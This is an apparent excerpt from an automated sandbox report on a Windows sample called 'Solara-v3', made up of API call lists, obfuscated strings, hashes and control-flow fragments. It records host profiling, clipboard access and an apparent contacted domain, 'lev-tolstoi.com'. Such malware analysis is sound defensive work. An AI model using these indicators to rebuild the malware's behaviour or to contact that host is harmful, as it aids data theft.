                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: X`X*$l'Y9${$[7
                                                                                                                                                                                                                                              • API String ID: 2994545307-1509796914
                                                                                                                                                                                                                                              • Opcode ID: a7d4199a11afbcf664926020d9bbf2455d7265343a18d6926ad5fef2716d1da4
                                                                                                                                                                                                                                              • Instruction ID: 627f6c153a1e7a7093b5324472515697c41291643dc6d7d1fda9c09fef2ffd72
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7d4199a11afbcf664926020d9bbf2455d7265343a18d6926ad5fef2716d1da4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5B15A72B043609BEB14CF14E84176B73A2EFD5304F96843EE8459B391E639EC09C389

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: F>]>$j>a>$ok
                                                                                                                                                                                                                                              • API String ID: 0-2883800044
                                                                                                                                                                                                                                              • Opcode ID: 9129864f14639d17449b2f603e3219f21eae55219ba341b137a72b1f0aae79bb
                                                                                                                                                                                                                                              • Instruction ID: dd8b5e7c3122165f2fea48d4b4d2b9f00cb897ce1b6d78e13b6b522b53c881e4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9129864f14639d17449b2f603e3219f21eae55219ba341b137a72b1f0aae79bb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76B1F17261C3118BD328DF14845156FBBF2EFD1304F16482DEAD5AB380D239A91ACB9B
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042CF80
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                              • String ID: 8a
                                                                                                                                                                                                                                              • API String ID: 3960555810-1827930058
                                                                                                                                                                                                                                              • Opcode ID: 81e50134e1fb4b6584dfc42dfbfb872d721f9fd4204c3a06ee038d379535b189
                                                                                                                                                                                                                                              • Instruction ID: fc3ee4ebcf7795b95269f936594514899a52a37c83a41ea56dd400e4873d1426
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81e50134e1fb4b6584dfc42dfbfb872d721f9fd4204c3a06ee038d379535b189
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14B1F37160C3918BD729CF2AD85136BFBE1AFD6304F58886EE0D6873A1D7398405CB56
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: 9.$9.
                                                                                                                                                                                                                                              • API String ID: 2994545307-2940951921
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042CF80
                                                                                                                                                                                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3960555810-0
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: mLjL
                                                                                                                                                                                                                                              • API String ID: 2994545307-1911556848
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LdrInitializeThunk.NTDLL(00423382,00000002,00000014,000000FF,00000000,?,00000002,?), ref: 0043CD4E
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                              • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                              • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                              • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: |X|X
                                                                                                                                                                                                                                              • API String ID: 0-2218283020
                                                                                                                                                                                                                                              • Opcode ID: ce84bb1b908e3da7b10efdad8a51853dd17b9261ed57cfd3814ffec2b1657eb9
                                                                                                                                                                                                                                              • Instruction ID: 13b12417835161548989760e477e4b9bf18457aaa1a030ea2397493de378e4bd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce84bb1b908e3da7b10efdad8a51853dd17b9261ed57cfd3814ffec2b1657eb9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D21A2BAE406228BC725CF58CC95BAAF7B0FF49700F024228ED49BB750D635AC4287D4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: 88498985efd4b3ba56db0083681181ecdc59f8f7a8d40373a67364ad67f09b48
                                                                                                                                                                                                                                              • Instruction ID: bda42ee7fe58aa78db34f1b728a56894abae76de33374c7402216ab42dc0119f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88498985efd4b3ba56db0083681181ecdc59f8f7a8d40373a67364ad67f09b48
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29812636A042119BCB249F18CC40AAFB3A2FFD8710F15A53DED859B364EB34AC158385
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: 1512670e2730101e1da27ba101819542289284cb3c28dd2e5113689dce48cd15
                                                                                                                                                                                                                                              • Instruction ID: e6a55991c61f36b3aa79f998637d078abe9e386279f295a7a094abe81f2018d2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1512670e2730101e1da27ba101819542289284cb3c28dd2e5113689dce48cd15
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97513735A083149BE720EF25C84476BB3A2FFD9700F15953EDA849B361E7756C1187C9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 963b01d9d9c5355ea5fc2f8ae16c758e2793185ce3c7b00e16d00e46dcfaf915
                                                                                                                                                                                                                                              • Instruction ID: f6c1554600131ee17df06160cbc0b7981c093ccfdab986da07a7a73cd69f7880
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 963b01d9d9c5355ea5fc2f8ae16c758e2793185ce3c7b00e16d00e46dcfaf915
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81415121B542778BEB148A249C623B7F791EB66380F9C827BD85587381E31CDC16E3D6
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: 7cf914e994c1d43a5ad869bc00fbdd8a30e72d999c25ec1797e9f8145f45b8fd
                                                                                                                                                                                                                                              • Instruction ID: de807461c8146aa5c2ca4a7867b47f0d9f0c6b40113fcb14a59165e0f2bfc41e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7cf914e994c1d43a5ad869bc00fbdd8a30e72d999c25ec1797e9f8145f45b8fd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED412638258300ABE714DF54DC81BBBB3A6EBC5314F19542EE2859B3A0D679AC319B09

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 004086E2
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004086E8
                                                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004086F9
                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 004087BA
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004087F9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4063528623-0
                                                                                                                                                                                                                                              • Opcode ID: 25297c4e6d31d418d84edee6cd033a4f8f22fc1c227bdeb32d9657ac67d9222f
                                                                                                                                                                                                                                              • Instruction ID: 2ce280b1cfb3896d9c47e6bfffc2885025d21bcec38fee026491e5ccd9a28d87
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25297c4e6d31d418d84edee6cd033a4f8f22fc1c227bdeb32d9657ac67d9222f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA2157B5E002005BD714BB25DE0B7AA36929FC6715F19853EF481FB3EADE7D4801829E

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              control_flow_graph 928 40e042-40e066 call 409570 CoUninitialize 931 40e070-40e0e2 928->931 931->931 932 40e0e4-40e156 931->932 933 40e160-40e187 932->933 933->933 934 40e189-40e19a 933->934 935 40e1bb-40e1c3 934->935 936 40e19c-40e1aa 934->936 938 40e1c5-40e1c6 935->938 939 40e1db-40e1e8 935->939 937 40e1b0-40e1b9 936->937 937->935 937->937 940 40e1d0-40e1d9 938->940 941 40e1ea-40e1f1 939->941 942 40e20b-40e213 939->942 940->939 940->940 943 40e200-40e209 941->943 944 40e215-40e216 942->944 945 40e22b-40e235 942->945 943->942 943->943 946 40e220-40e229 944->946 947 40e237-40e23b 945->947 948 40e24b-40e257 945->948 946->945 946->946 949 40e240-40e249 947->949 950 40e271-40e3a4 948->950 951 40e259-40e25b 948->951 949->948 949->949 952 40e3b0-40e3db 950->952 953 40e260-40e26d 951->953 952->952 955 40e3dd-40e402 952->955 953->953 954 40e26f 953->954 954->950 956 40e410-40e44f 955->956 956->956 957 40e451-40e480 call 40b640 956->957 959 40e485-40e4b1 957->959
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Uninitialize
                                                                                                                                                                                                                                              • String ID: >$&j=$lev-tolstoi.com
                                                                                                                                                                                                                                              • API String ID: 3861434553-369662323
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042C98B
                                                                                                                                                                                                                                              • API ID: ComputerName
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3545744682-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetUserDefaultUILanguage.KERNELBASE ref: 00436B5E
                                                                                                                                                                                                                                              • API ID: DefaultLanguageUser
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 95929093-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B4B0,00000000,00000001), ref: 0043CCF2
                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CC25
                                                                                                                                                                                                                                              • API ID: InitializeSecurity
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 640775948-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • API ID: BlanketProxy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3890896728-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • API ID: BlanketProxy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3890896728-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0043CE9A
                                                                                                                                                                                                                                              • API ID: ForegroundWindow
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2020703349-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CBF3
                                                                                                                                                                                                                                              • API ID: Initialize
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,00000000,?,004121FC), ref: 0043B1BE
                                                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,00408749,?,00408749), ref: 0043B190
                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00423D59
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00423D99
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                              • String ID: 9$&Kt0$45$<$>>$AQ$PR$Vq$Vq$XH$Ys$\\$_p$bo$ef$mm$rl$wY$|i$|s
                                                                                                                                                                                                                                              • API String ID: 237503144-3538275056
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 9$&Kt0$0b$45$<$>>$AQ$PR$Vq$Vq$XH$Ys$\\$_p$bo$ef$mm$rl$wY$|i$|s
                                                                                                                                                                                                                                              • API String ID: 0-1097330926
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 9$&Kt0$45$<$>>$AQ$PR$Vq$Vq$XH$Ys$\\$_p$bo$ef$mm$rl$wY$|i$|s
                                                                                                                                                                                                                                              • API String ID: 0-3538275056
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "f&f$)fvf$,ZA$,f4f$21$=f!f$=f(f$Jc1t$Jc1t$Pf6f${fGf
                                                                                                                                                                                                                                              • API String ID: 0-710588756
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: #3#3$#3=3$'3!3$*$83F3$83R3$93=3$:3 3$J3L3$O30$d3f3$i3_3$k3l3
                                                                                                                                                                                                                                              • API String ID: 0-1612148737
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042860A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                              • String ID: J$,J^J$bJSJ$cJwJ$rJnJ$tJdJ$wJbJ
                                                                                                                                                                                                                                              • API String ID: 237503144-492521606
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: J$,J^J$Uqmq$bJSJ$cJwJ$oq|q$rJnJ$tJdJ$wJbJ
                                                                                                                                                                                                                                              • API String ID: 0-594100160
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Clipboard$CloseDataGlobalLockOpen
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1494355150-0
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 6""$D$d"P"$p"F"$""$""
                                                                                                                                                                                                                                              • API String ID: 0-1382292853
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: M2x2$c2o2$m2?2$o2x2$u202$}2q2
                                                                                                                                                                                                                                              • API String ID: 0-1290146539
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: %M)M$)M-M$-M M$4M:M$>M5M$MM
                                                                                                                                                                                                                                              • API String ID: 0-1618744259
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0043CD20: LdrInitializeThunk.NTDLL(00423382,00000002,00000014,000000FF,00000000,?,00000002,?), ref: 0043CD4E
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0041A030
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0041A0CE
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                              • String ID: Fn@n
                                                                                                                                                                                                                                              • API String ID: 764372645-2265005453
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 004184AC
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                              • String ID: S-#9
                                                                                                                                                                                                                                              • API String ID: 237503144-700798346
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: E38030A6CBA13717BCFD68B774EF9B7A$bC$mX$pid
                                                                                                                                                                                                                                              • API String ID: 0-2736358017
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 517$02"4
                                                                                                                                                                                                                                              • API String ID: 0-4117730321
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: @$@
                                                                                                                                                                                                                                              • API String ID: 0-149943524
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "C
                                                                                                                                                                                                                                              • API String ID: 0-2206442469
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "C
                                                                                                                                                                                                                                              • API String ID: 0-2206442469
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
